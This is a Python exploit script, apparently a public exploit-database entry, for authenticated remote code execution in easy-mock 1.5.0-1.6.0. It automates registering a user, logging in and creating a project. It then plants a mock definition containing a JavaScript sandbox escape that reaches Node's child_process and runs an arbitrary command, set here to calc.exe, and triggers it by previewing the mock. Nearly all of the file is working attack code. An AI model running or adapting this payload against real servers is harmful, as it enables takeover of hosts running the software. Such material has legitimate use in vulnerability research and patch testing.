64 lines
No EOL
5.7 KiB
Python
Executable file
64 lines
No EOL
5.7 KiB
Python
Executable file
# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 12/08/2021
|
|
# Exploit Author: LionTree
|
|
# Vendor Homepage: https://github.com/easy-mock
|
|
# Software Link: https://github.com/easy-mock/easy-mock
|
|
# Version: 1.5.0-1.6.0
|
|
# Tested on: windows 10(node v8.17.0)
|
|
|
|
import requests
|
|
import json
|
|
import random
|
|
import string
|
|
|
|
target = 'http://127.0.0.1:7300'
|
|
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
|
|
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
|
|
print(username)
|
|
print(password)
|
|
# can't see the result of command
|
|
cmd = 'calc.exe'
|
|
|
|
# register
|
|
url = target + "/api/u/register"
|
|
cookies = {"SSO_LANG_V2": "EN"}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
|
|
json_data={"name": username, "password": password}
|
|
requests.post(url, headers=headers, cookies=cookies, json=json_data)
|
|
|
|
# login
|
|
url = target + "/api/u/login"
|
|
cookies = {"SSO_LANG_V2": "EN"}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
|
|
json_data={"name": username, "password": password}
|
|
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
|
|
login = json.loads(req)
|
|
token = login['data']['token']
|
|
|
|
# create project
|
|
url = target + "/api/project/create"
|
|
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
|
|
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
|
|
requests.post(url, headers=headers, cookies=cookies, json=json_data)
|
|
|
|
# get project_id
|
|
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
|
|
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
|
|
req = requests.get(url, headers=headers, cookies=cookies).text
|
|
projects = json.loads(req)
|
|
project_id = projects['data'][0]['_id']
|
|
|
|
# create mock
|
|
url = target + "/api/mock/create"
|
|
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
|
|
json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username}
|
|
requests.post(url, headers=headers, cookies=cookies, json=json_data)
|
|
|
|
# preview mock
|
|
url = target + "/mock/{}/{}/{}".format(project_id,username,username)
|
|
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
|
|
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
|
|
requests.get(url, headers=headers, cookies=cookies) |